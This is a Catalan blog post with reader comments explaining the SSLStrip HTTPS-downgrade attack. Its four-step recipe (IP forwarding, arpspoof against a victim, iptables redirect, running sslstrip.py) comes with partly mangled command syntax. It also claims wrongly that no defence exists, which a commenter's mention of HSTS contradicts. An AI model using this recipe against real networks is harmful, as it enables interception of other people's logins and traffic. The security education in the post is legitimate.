|
Moxie Marlinspike va presentar al Black Hat 2009 una enginyosa eina anomenada SSLStrip, Dirigida a fer creure a l'usuari que es troba en un lloc web amb xifrat SSL quan en realitat totes les dades estan sent transmesos en obert. Addicionalment, SSLStrip també enganya el servidor web, el presumpte xifrat queda anul·lat encara que el lloc segueix comportant-se com si funcionés.
Fins on vaig poder esbrinar, aquest mètode segueix funcionant d'allò més bé. L'amenaça segueix aquí i estem tots exposats. Buahaha ... |
Comencem pel bàsic: què dimonis és SSL?
Per aquells que no ho saben, Secure Sockets Layer (SSL; protocol de capa de connexió segura) i el seu successor Transport Layer Security (TLS; seguretat de la capa de transport) són protocols criptogràfics que proporcionen comunicacions segures per una xarxa, Comunament Internet.
SSL s'executa en una capa entre els protocols d'aplicació com HTTP, SMTP, NNTP i sobre el protocol de transport TCP, que forma part de la família de protocols TCP / IP. Encara que pugui proporcionar seguretat a qualsevol protocol que usi connexions de confiança (tal com TCP), s'usa en la majoria dels casos al costat de HTTP per formar HTTPS. HTTPS és usat per assegurar pàgines World Wide Web per a aplicacions de comerç electrònic, Utilitzant certificats de clau pública per a verificar la identitat dels extrems.
SSLStrip ... ¿va tornar el porno a Fem servir Linux?
El funcionament de SSLStrip és simple, reemplaça totes les peticions HTTPS d'una pàgina web per HTTP i després fa un MITM (atac «Home en el Medi«) Entre el servidor i el client. La idea és que la víctima i l'agressor es comuniquin a través d'HTTP, mentre que l'atacant i el servidor, es comuniquen a través d'HTTPS amb el certificat de servidor. Per tant, l'atacant és capaç de veure tot el trànsit en text pla de la víctima.
A continuació els deixo vídeo, on podem apreciar en funcionament d'aquesta excel·lent eina.
Com utilitzar SSLStrip
1.- Configura IP Forwarding
echo 1> / proc / sys / net / ipv4 / ip_forward
2.- Realitzant atac ARP MITM entre les 2 maquines:
arpspoof -i eth0 -t VÍCTIMA HOST
3.- Redireccionar tràfic amb iptables:
iptables -t nat -A PREROUTING -p tcp -destination-port 80 -j REDIRECT -to-ports 8080
4.- Inicia SSLStrip al port utilitzat
python sslstrip.py -w arxiu
Com protegir d'atacs de SSLStrip?
Això és el més bell i terrible: no es pot.
D'acord amb el que demostrat per Moxie (el seu vídeo de poc més de 69 minuts no té desperdici) l'única probable solució a tot això és xifrar totes les connexions HTTP, és a dir, que el «HTTP» comú i silvestre sigui reemplaçat en totes les seves instàncies per «HTTPS», sense importar pàgina o servei. Tal com Moxie ho va dir, «un protocol segur que depèn d'un protocol insegur, és un problema".
Què pots fer com a usuari per a el menys reduir les chances de ser atacat? Verificar de manera paranoica que hi hagi un «https» davant de cada pàgina que sigui compromesa, o en el cas dels usuaris de Firefox instal·lar NoScript i forçar connexions HTTPS en totes les pàgines. I tot i així, això només minimitzaria l'efecte, no ho anul·laria.
Mmmm ... respecte a https que et protegeixi de l'atalli, és relatiu.
No sé fins a quin punt els atacs MITM no són reeixits contra connexions SSL, atacs MITM treballen sobre la capa d'enllaç mentre que ssl a la capa de transport, de manera que captació de dades és possible.
Fa molt vaig estar fent proves per a un treball d'un curs que vaig fer amb MITM a la meva xarxa local i és possible prendre dades enviades per SSL, provin amb hotmail (que és ssl) i et torna el pass sense problemes. Simplement pensin l'atacant es fa passar per la porta d'enllaç i rep tota la info de la víctima.
L'única manera de saber que el teu info viatja segura és usant un túnel ssh.
Jo el que faig si em sento una mica perseguit, és connectar-me al meu servidor mitjançant ssh, fer un túnel per algun port local, obrir els sockets i utilitzar la meva connexió d'internet de casa meva per navegar estant en l'equip aliè.
I com bé van dir, no hi ha forma d'evitar aquest atac, llevat assegurar el nostre dhcp per mac i segurizar qui es connecta ....
hola, en la comanda abril et va faltar «-l 4»
ok. gràcies!
Per ser més específics, el punt on ja no et pots protegir és un cop atrapat en l'atac MitM. Hi ha diverses maneres de protegir-te d'aquest atac tot i que és difícil per que té variants.
EDIT:
Valgui l'actualizacion de l'comentari !, m'assabenti que a el menys des de gener de 2012 els exploradors chrome i firefox (no m'estranyaria que a hores d'ara siguin tots) usen capçaleres HSTS. Segons es diu aquesta capçalera resol la vulnerabilitat informant el nevegador que «les connexions» han d'usar sempre SSL després d'un sol primer intent de connexió amb un lloc (això manté la vulnerabilitat disminuidamente present). Més encara, que Chrome augmenta la seguretat afegint una llista de llocs HSTS (probablement el més popular de la xarxa). font: http://forums.hak5.org/index.php?/topic/25322-sslstrip-not-working-with-gmail-twitter/
Molt bo, em sembla super genial. La idea és realment senzilla 😀
Així és ...
Sap algú si arpspoof es pot utilitzar quan tenim més d'un host a la xarxa ?. Gràcies.